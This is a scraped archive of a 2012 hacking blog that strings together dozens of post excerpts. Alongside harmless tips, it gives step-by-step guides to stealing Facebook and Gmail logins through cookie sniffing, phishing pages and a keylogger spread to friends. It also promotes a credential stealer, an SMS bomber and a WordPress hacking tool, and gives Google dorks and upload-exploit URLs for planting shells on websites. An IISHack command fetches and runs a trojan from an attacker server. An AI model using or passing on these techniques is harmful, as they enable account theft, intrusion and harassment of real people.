Monday, December 31, 2012

SSH back door

Many times I'll be at a site where I need remote support from someone who is blocked on the outside by a company firewall. Few people realize that if you can get out to the world through a firewall, then it is relatively easy to open a hole so that the world can come in to you.
In its crudest form, this is called "poking a hole in the firewall." I'll call it an SSH back door. To use it, you'll need a machine on the Internet that you can use as an intermediary.
In our example, we'll call our machine blackbox.example.com. The machine behind the company firewall is called ginger. Finally, the machine that technical support is on will be called tech. Figure 4 explains how this is set up.

Figure 4. Poking a hole in the firewall
Here's how to proceed:

Tuesday, July 10, 2012

Session ID Analysis

In this tutorial we focus on session ID analysis. If you are not familiar with session IDs, here is a quick explanation. HTTP is a stateless protocol, so it’s equivalent to walkie-talkies or CB radios: you send a request and wait for a reply; you don’t have a constantly open communication line as you would with a phone. So in order to emulate this open communication, the HTTP protocol uses session IDs, commonly known as cookies. These cookies are simply agreements between you and the web application that you are who you claim to be. Once you have exchanged your cookie with the website, you can then talk back and forth as long as the cookie is tied to your communication. So there’s the quick and dirty intro to session IDs. The next logical question is how does this session ID process work, or even better, how should it work? Let’s use a web mail application as an example:
  1. You log in to your web mail account
  2. Your web mail provider sends you a “random” cookie that is tied to your login session
  3. Each time you click on a new message within your Inbox, your cookie is sent along to validate who you claim to be; that way you’ll get your next message and not another person’s message.

Speaking Leet : Language of Hackers

To speak leet, you more or less need to un-learn proper English. The history of leet goes back to the early days of online message boards, or forums, where users can post messages to carry on a threaded conversation. In an attempt to “clean up” the language that users would sometimes post, admins added a filtering system to the message board which would replace restricted words with some type of alternative. For example, the word “crap” might become “crud.” It didn’t take people long to figure out that you could get around this filter simply by altering the original word somehow, like changing “crap” to “c-r-a-p” or “krap” or “crrrap.” It was soon obvious that these filtering systems could never possibly cover every variation because people would just keep inventing new ones, and so leet was born.

How to find or remove the Virus ?

If you’ve let your guard down–or even if you haven’t–it can be hard to tell if your PC is infected. Here’s what to do if you suspect the worst.
Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you’ll lose all your data, and you’ll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.
You know they’re right. Yet for one reason or another, you’re not running antivirus software, or you are but it’s not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you’ve put off renewing.
It happens. It’s nothing to be ashamed of. But chances are, either you’re infected right now, as we speak, or you will be very soon.

Resetting Ubuntu 11.10 Password

Hey Guys,
If you’ve forgotten your Ubuntu 11.10 password, you can reset it within minutes. I will tell you two methods to reset your Ubuntu password. The first one is by booting into recovery mode and the second one is by using any live OS.

Let’s start with the recovery mode first, as it takes less time and is easier to do than the second method:

Boot up your Ubuntu. Press and hold the ‘Shift’ key while the machine is booting. You will get the GRUB menu like this:



Select the second option, which is ‘Recovery Mode’, and press Enter. After pressing Enter the system will start booting and you will get a list of options like this:

Internet Access In Backtrack Virtual Machine

Hey Guys,
I’ve found that some people are struggling hard to access the internet in their BackTrack virtual machine from their USB modem, so today I am going to tell you how you can access the internet in your virtual machine through your datacard.
Open Network Adapter Settings (Run -> ncpa.cpl).
Right-click on your USB modem adapter and go to Properties.




Cracking Linux Password when Grub cannot be changed

In the previous post we learnt about cracking the Linux password using GRUB – dropping to single user mode. However, if GRUB is password protected, then this method will not work. So in such cases, we can use a Linux Live CD to crack the Linux password. Follow the steps given below to change the Linux password using the Linux Live CD.
  1. Boot your computer from your Linux Live CD, choosing “Try Linux without any change to your computer” from the boot menu.

BackTrack 5 Released – The Most Advanced Linux Security Distribution & LiveCD

We have of course been following BackTrack since the very early days, way back in 2006 when it was just known as BackTrack – a merger between WHAX and Auditor. They’ve come a long way and BackTrack is now a very polished and well-rounded security distro; most of the others have dropped off the map, leaving BackTrack as the giant in the security LiveCD space.
The last major release was BackTrack Final 4 Released – Linux Security Distribution – back in January 2010.

The BackTrack dev team has worked furiously in the past months on BackTrack 5, code name “revolution” – they released it on May 10th. This new revision has been built from scratch, and boasts several major improvements over all our previous releases. It’s based on Ubuntu Lucid LTS – kernel 2.6.38, patched with all relevant wireless injection patches. Fully open source and GPL compliant.

Monday, July 9, 2012

How To Hack Facebook Account Using Wireshark

In this tutorial we will have a look at how you can hack a Facebook account using Wireshark. First of all I must make clear that even though you'll get access to the victim's account, you'll not get his/her password; next, this trick will work only on a LAN with a hub. It will also work on a LAN with a switch, but you'll have to perform ARP poisoning; click on the link to know more.
Here I surely won't discuss how to use Wireshark; please read our previous tutorials to learn how to use Wireshark.

For this hack you'll need Wireshark, which is a packet sniffing tool, the Mozilla Firefox web browser and the Add N Edit add-on for Mozilla Firefox. Now I assume you have all of the above components for hacking Facebook and you are connected to a hub-based LAN or a LAN which has been ARP poisoned. So now click on the capture button and start capturing packets.

What Is Phishing

Here in this post we will discuss a little about what phishing is. Please note that what we are covering here is just the basics and not a phishing tutorial. In a phishing attack, an attacker creates a fake login page of a legitimate website and lures the victim into logging in using it. The site under attack is known as the phished site and the fake login page used for capturing or stealing information is known as the phished page. To perform a phishing attack an attacker performs the following steps.
First of all he gets a free web host and then selects a domain which somehow resembles the site he wants to phish. For example, to hack a Gmail password he/she may select a domain like Gmial. Look carefully: both words appear nearly similar when just glanced at, and that is where an attacker makes a catch.

How To Hack Facebook Account | Phishing

In this tutorial we will discuss how you can hack a Facebook account password by phishing. Phishing is the act of creating a replica of a legitimate website for stealing passwords, credit card numbers, etc. Here I will show you how you can create a replica of the Facebook log-in page and then fool your victim into putting his username and password in it so that you can get his account password.
First of all open www.facebook.com in your web browser, from the “File” menu select “Save as”, type “Facebook” in the file name and select “Web page, complete” from the save-as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. The folder will have several files in it; leave them as they are and open Facebook.html in Notepad or WordPad. From the Edit menu select Find, type action in it and locate the following string.

JSON XSRF Attacks


Welcome to another episode of Cross Site Request Forgery Attacks on DEVILS BLOG ON SECURITY. In this post we will discuss a little about JSON hacking. Now you might ask why we haven't covered JSON XSRF attacks along with the other XSRF attacks. This question is a little difficult to answer, but here's my explanation. All other XSRF attacks usually depend on session management attacks in one way or another; directly or indirectly, XSRF attacks can be called a derivative obtained by adding and integrating session management attacks, frame injection flaws and cross site scripting, whereas the case is a little different in JSON XSRF attacks. Many professionals even object to the inclusion of the JSON attack as an XSRF attack, but we have nothing to do with that. So let's see how JSON XSRF attacks are different from other XSRF attacks.

JSON XSRF Attacks


In our last post on JSON XSRF attacks we saw some basics about XSRF attacks. So now in this section we will have a look at how to find and exploit a JSON vulnerability for an attack. As told in the previous post, the JSON vulnerability exists when the JSON data transfer format is used instead of the standard XML data transfer format, and that happens only in AJAX-based web applications, so the following are your steps to find out whether a site is vulnerable or not.


  • If the web application is running on AJAX, then check whether the application's response type is JSON format or JavaScript.
  • Now determine whether a cross-domain request can be made to it or not. If yes, check the transferred parameters: if they are the same for each request or they are predictable, then the web application is vulnerable.

SSL And TLS Attacks | SSL Man In The Middle

In our last post we discussed a little about attacking weak ciphers; in this post we will have a look at how Man In The Middle (MITM) attacks can be performed over SSL and TLS encrypted data transfer. The attack uses sslstrip, developed by Moxie Marlinspike, with an ARP spoofing tool and a packet sniffer. The attack can be performed exclusively from UNIX and Linux based platforms, hence I suggest you use Dsniff. Practically, sslstrip was developed to demonstrate how an attacker can lead visitors from a legitimate site to his/her own site. The attack used a null-character misinterpretation vulnerability which existed in several certificates during 2009.


I think it's not good to demonstrate how the attack can be performed, since Moxie Marlinspike has already provided a nice tutorial on his own website with a video.

Cross Site Scripting (XSS) | The Basics


In the following post we will have a basic look at Cross Site Scripting. Cross site scripting is also known as XSS, and many times people also abbreviate it as CSS (by the way, CSS means Cascading Style Sheets). Commonly XSS is a web application attack and not a web server attack; it occurs in a web application which accepts input without validation and sanitization, giving an attacker the chance to run a malicious script. An XSS vulnerability occurs in a web application due to the dynamic nature of a web page, which is attained by JavaScript, VBScript, ActiveX controls, Flash content and scripts, and sometimes with the help of HTML too.

Making your own trojan in a .bat file

Open a DOS prompt; we will only need a DOS prompt and Windows XP…
-Basics-
Opening a DOS prompt -> Go to Start, then Run, and write
cmd and press OK
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
OK, in this tutorial we will use 3 of the commands listed here;
they are: net user, net share and net send
We will select some of those commands and put them in a .bat file.
What is a .bat file?
A .bat file is a piece of text that Windows will execute as commands.
Open Notepad and write there:

Sunday, July 8, 2012

Hack a Website Using Remote File Inclusion




Remote file inclusion is basically one of the most common vulnerabilities found in web applications. This type of vulnerability allows the hacker or attacker to include a remote file on the web server. If the attacker succeeds in performing the attack he/she will gain access to the web server and hence can execute any command on it.

Friday, June 29, 2012

Google trick to find private pictures!

Maybe you are a "voyeur".

Maybe you need some pictures for your school work.

Of course you can go to a dedicated website where you can find lot of free pictures.

But you can also dig some private pictures directories.

Try this little code in Google; you may find a lot of non-public pictures
 
Quote:
intitle:index.of +"Indexed by Apache::Gallery"
search by adding a word at the end, for example:

Hack about 80% of every website out there


All right,
You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc.

You want to learn to hack, stop asking stupid questions.

There is ONE tool that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have:

It's called Acunetix.

Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible SQL, XSS and HTML injections, all Java injections, all password and database weaknesses, all FTP weaknesses, etc., all form submission exploits that the website can be targeted with, and remote upload and download vulnerabilities.

Beaver's SMS Bomber Pro

Features Include:
Full Feature List:
Custom SMTP Server (Make Sure You Type It Right)
Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself)
Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send)
Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings)
Fixed XP GUI Issues
Stop Bombing At Any Time
Watch The Number Of SMS Sent In The Title Bar
No Longer Freezes While Sending
Added A Recent slave's Box Where You Can Select An Entry And Right-Click It To Bomb It Again Or Delete It From The List
Save/Load Recent Victims List

Use SSH Tunneling to surf net invisibly

Unable to surf the net at work/college? Want to surf the net invisibly? Well, we have a solution for that: SSH tunneling. An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel. In easy language, you can surf the net without being monitored and even surf blocked sites too. SSH is pretty awesome.

Without leaving your seat, you have a way to control a computer which may be located anywhere on this planet. SSH Tunneling

{Linux} Tips and Tricks

Are you a Unix geek? Here are some indispensable Linux tips and tricks which are useful for new and knowledgeable users alike. Let's have a look at them – more Linux tips and tricks for geeks and newbies alike

Speeding up your hard drive

Get faster file access by using 32-bit transfers on your hard drive

Just add the line:

    hdparm -c3 /dev/hdX

to a bootup script. If you use SuSE or other distros based on SYS V,

Learn How To Hack Web Servers


Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by the IIS HTTP daemon, allowing arbitrary code to be executed.
 
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port it's listening on, www.yourserver.com is some web server with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.
 
"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions. A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file of type HTR and invokes ISM.DLL to handle the request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.

Speed Up Windows


Safely turn Off Windows Services To speed up Windows

Some of the Windows services start with Windows, eating up memory, and if they are not used by you then you can stop them from starting with Windows. You can re-enable them when you need them.


To open the Services program, go to

Start -> Run -> type "services.msc" (without quotes) -> and hit Enter.

There will be a list of services. Some common services you can check and stop according to your needs:

Hack Gmail Accounts

Today I will explain to you how to hack a Gmail account step by step. In my previous article I explained the basic technique involved in hacking a Gmail account or password but not in an extended way; today I will disclose how hackers really hack the Gmail account or Gmail password using fake pages, simply called phish pages, and the technique involved is called phishing.

NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY. DON'T MISUSE IT.





RAR Password Recovery Magic 6.1.1.378 Full




 

RAR Password Recovery Magic is a powerful tool designed to recover lost or forgotten passwords for RAR/WinRAR archives. RAR Password Recovery Magic supports customizable brute-force and dictionary-based attacks. RAR Password Recovery Magic has an easy to use interface.

RAR Password Recovery Magic 6.1.1.378.Incl.Serial


Download : | FileSonic | DepositFiles | Turbobit |

Send Sms From Friends MobileTo Any Number

Hello friends, today I am sharing an awesome trick with you all. Today I will tell you how to send anonymous SMS, i.e. how to send SMS from any mobile number to any mobile number; that means how to send SMS from your friend's mobile to your mobile, or from your friend's mobile to your friend's mobile, or to any other number. Basically this technique is called SMS spoofing. By SMS spoofing we can send SMS to any mobile using anyone's mobile number. How can this trick be helpful? It's simple: it is helpful when you want to prank your friends or enemies, or simply want to send free SMS to your friends using their own numbers. So friends, read on...

Hiren's Bootcd 12.0 + Keyboard Patch




Hiren's BootCD is a live CD containing various diagnostic programs such as partitioning agents, system performance benchmarks, disk cloning and imaging tools, data recovery tools, MBR tools, BIOS tools, and many others for fixing various computer problems. As it is a bootable CD, it can be useful even if the primary operating system cannot be booted. Hiren's Boot CD has an extensive list of software. Utilities with similar functionality on the CD are grouped together and seem redundant; however, they present choices through different UIs and options in what they can do. Hiren's Boot CD also provides the option to boot in "Mini XP Mode," a very simple, but usable, version of XP with all of Hiren's tools available.

USB Disk Security v5.4.0.12 Final


USB Disk Security provides 100% protection against any threats via USB drive; however, the majority of other products are unable even to guarantee 90% protection. USB Disk Security is the best antivirus software to permanently protect an offline computer without the need for signature updates, whereas other antivirus software must update its signature database regularly and cannot effectively protect an offline computer. This light and easy to use solution is 100% compatible with all software and doesn't slow down your computer at all. You pay for USB Disk Security once and get it all; however, other antivirus products must be paid for updates every year.

Reset Windows Password Advanced Edition v1.2.1.195 Retail




A lost password or locked Windows account is the most frequent problem data recovery specialists have to deal with. You could format the hard drive or reinstall your operating system, but that wouldn't keep you from partial loss of data, personal settings and an extra headache. Besides, all that can take some time. There is a quicker and more elegant way out of this situation. Just run Reset Windows Password from a bootable CD or USB and reset the forgotten password or unlock the account. It's a matter of a few minutes! Reset Windows Password is the most powerful solution for recovering or resetting all types of Windows account passwords: user, administrator, Active Directory accounts, and domain administrators.

Registry Purify 5.14 Final




Registry Purify analyzes and cleans invalid entries in the Windows registry, backs up and restores the entire registry at the system file level, and compacts the registry to gain efficiency.

Main Features:
  • New Scan Engine
Registry Purify improves analyzing speed by over 50% compared to the normal algorithm by using the new "SharpANA Engine". Meanwhile, the "SharpANA Engine" noticeably reduces hard disk reads, which protects your hard disk effectively. The proper use of multithreading reduces consumption of system resources.

Protect Folder 3.2.1.0 Final




 

Protect Folder 3.2.1.0 Full Version

Encrypt your files and data on-the-fly with a secure password. Protect Folder provides on-the-fly protection of your files, folders and removable drives. No need to run anything to access encrypted folders. Just double-click on a protected folder and enter your password, and you can access your protected data completely transparently - exactly as you would access any other file or folder.

How to run JPG as an EXE


I have searched on this forum and have not found this method anywhere so I decided to post it. Note I have used this method for years and it works on every Windows OS.

Requirements:
Windows
Your EXE.


Step 1 :

First things make a New Folder


[Image: Screen_shot_2011-02-24_at_11.34.20_PM.png]

How to Enable Right Click in Websites


You have probably sometimes tried to save images or copy the contents of a website that forbids the use of the right-click. Most websites use JavaScript to prohibit the use of the right-click, so to enable it you should disable JavaScript.
There are many ways to do it; the simplest in my opinion is using Web Developer 1.1.9, a Firefox add-on.

1) Download Web Developer 1.1.9 from this link

2) Click Disable button
[Image: disable-.jpg]

3) Select Disable Javascript
[Image: disable-javascript-.jpg]

4) Again select “All Javascript” option.
[Image: all-javascript.jpg]

How To Hack Websites And WebServers


Before you hack a system, you must decide what your goal is. Are you hacking to take the system down, gain sensitive data, break into the system and take 'root' access, screw up the system by formatting everything in it, discover vulnerabilities and see how you can exploit them, etc.? The point is that you have to decide what the goal is first.
Download Tutorial How to Hack Webservers
The most common goals are:

1. breaking into the system & taking the admin privileges.
2. gaining sensitive data, such as credit cards, identification theft, etc.

You should have all of your tools ready before you start taking the steps of hacking. There is a Linux distribution called BackTrack. It is an operating system that comes with various sets of security tools that will help you hack systems (penetration tests).

Tuesday, June 5, 2012

Manually Hide any file in JPEG

Hello friends, today I will explain to you how to hide any file behind a JPEG image manually, that is, without any software. It's a very easy trick and also very useful if you want to send information secretly to your friend. It's also different from steganography, which hides text behind images or text behind mp3 files. It's universal: you can hide any file, virus or trojan or anything behind an image using this trick.


Things that you will need for this trick:
1. Winrar installed on your system.
2. Little knowledge of command prompt.

Tuesday, May 15, 2012

Hack facebook password remotely

Hacking a Facebook account is very easy and requires no more than 10 minutes of work. Don't worry, I will also tell you how to protect your Facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your Facebook account. So first I'll teach you how to hack a Facebook account remotely and then I will tell you how to protect yourself from this.

So guys lets start hacking Facebook account or passwords....


Steps to hack Facebook account using Keylogger:

1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.


Step 1. Creating the Keylogger Server

1. Download the keylogger.
Download

Pesca 0.75 local stealer Ftp+Mail+Php Uploader + Php logger



Steals:

* MSN Messenger
* Windows Messenger
* Windows Live Messenger
* Yahoo Messenger (5.x and 6.x)
* Google Talk
* ICQ Lite 4.x/5.x/2003
* AOL Instant Messenger (v4.6,6.x,Pro)
* Trillian
* Miranda
* GAIM/Pidgin
* MySpace IM
* PaltalkScene
* Outlook Express
* Microsoft Outlook 2000

Mr.Dark Soul's Wordpress Blog Hacker

It's a Wordpress hacking software named Mr.Dark Soul Wordpress Blog Hacker. It's a special soft for newbies who want to hack WP blogs. The screenshot is enough for teaching how to use Mr.Dark Soul Wordpress Blog Hacker.


Click On Images For Larger Size or its Image Links 
http://i.imgur.com/BCXFD.gif
http://i.imgur.com/ywccU.gif
http://i.imgur.com/dhn43.gif
http://i.imgur.com/yJxc2.gif

[Image: BCXFD.gif]

Another Easy Method of Wordpress Blog Hacking (Wordpress Easy Comment)

So it's a new tut of Wordpress blog hacking. Let's start ...
Open Google.com and enter this dork
inurl:"fbconnect_action=myhome"
[Image: untitled24.JPG]
You will find many sites. Select the site which you are comfortable with.

"Portail Dokeos" deface and Shell Upload vulnerability

The Portail Dokeos vulnerability is a kind of FCKeditor remote file upload vulnerability.
In this vulnerability a hacker can upload a shell, deface page or any file to the website without the admin username and password.



Google Dork : "Portail Dokeos 1.8.5"
Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability"




Open Google.com and type this dork
intitle:"QuiXplorer 2.3 - the QuiX project"


You'll see a lot of sites; some big websites are vulnerable too, like the Harvard university website.
Select any website from the search results.
Vulnerability


http://[localhost]/[path]/index.php?action=list&order=name&srt=yes




http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
After going to this URL you will see a file manager;
you can upload your files here.